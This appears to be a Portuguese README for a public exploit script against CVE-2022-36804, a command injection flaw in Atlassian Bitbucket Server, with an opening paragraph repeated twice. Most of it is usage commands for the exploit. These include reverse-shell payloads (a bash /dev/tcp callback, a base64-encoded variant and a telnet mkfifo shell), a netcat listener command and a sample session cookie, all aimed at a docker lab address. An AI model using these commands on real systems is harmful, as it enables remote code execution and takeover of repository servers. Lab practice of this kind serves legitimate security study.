
Uma vulnerabilidade crítica de injeção de comandos foi encontrada em vários endpoints de API do Atlassian Bitbucket Server e Data Center. Esta vulnerabilidade afeta todas as versões do Bitbucket Server e Data Center lançadas antes das versões <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 e <8.3.1
Uma vulnerabilidade crítica de injeção de comandos foi encontrada em vários endpoints de API do Atlassian Bitbucket Server e Data Center. Esta vulnerabilidade afeta todas as versões do Bitbucket Server e Data Center lançadas antes das versões <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> e <8.3.1>
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7
Substitua 172.17.0.3 pelo seu endereço IP local
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
Inicie o listener netcat com:
nc -lvp 4444
Converta /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 para base64 em caso de erro de execução do payload.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
Se você ainda estiver enfrentando algum erro, execute o comando abaixo:
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
É recomendável instalar a versão vulnerável do Bitbucket Server em uma máquina Windows/Linux para praticar. Será mais fácil obter um reverse shell em comparação com imagens docker.
Mais informações podem ser encontradas aqui